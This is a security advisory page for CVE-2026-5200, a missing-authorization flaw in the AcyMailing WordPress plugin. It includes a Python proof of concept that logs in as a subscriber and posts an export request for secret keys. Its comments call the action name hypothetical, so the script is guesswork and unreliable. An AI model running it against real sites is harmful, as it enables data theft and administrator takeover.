Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-5200 CVSS 8.8 HIGH

CVE-2026-5200

Published: 2026-05-20 08:16:23
Last Modified: 2026-05-20 13:54:55
Source: [email protected]

Description

The AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 10.8.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify privileged AcyMailing configuration, export subscriber secret keys, and chain these actions into administrator account takeover when a target administrator email address is known.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AcyMailing <= 10.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Configuration target_url = "http://example.com/wp-admin/admin-ajax.php" username = "subscriber" # Low-privileged user password = "password" # 1. Authenticate as a low-privileged user session = requests.Session() login_payload = { 'log': username, 'pwd': password, 'redirect_to': '', 'wp-submit': 'Log In', 'testcookie': '1' } # Attempt login login_response = session.post("http://example.com/wp-login.php", data=login_payload) if "ERROR" in login_response.text: print("[-] Login failed") exit() print("[+] Login successful") # 2. Exploit Missing Authorization to export secret keys # Note: The specific 'action' parameter depends on the plugin's actual implementation exploit_payload = { 'action': 'acymailing_export_keys', # Hypothetical action based on vulnerability description 'config': 'export_all' } try: response = session.post(target_url, data=exploit_payload) if response.status_code == 200 and "secret_key" in response.text: print("[+] Exploit successful! Extracted data:") print(response.text) else: print("[-] Exploit failed or patch applied.") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5200", "sourceIdentifier": "[email protected]", "published": "2026-05-20T08:16:22.860", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 10.8.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify privileged AcyMailing configuration, export subscriber secret keys, and chain these actions into administrator account takeover when a target administrator email address is known."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3516422/acymailing", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f8470662-2247-4159-9dac-f13677c94bdf?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.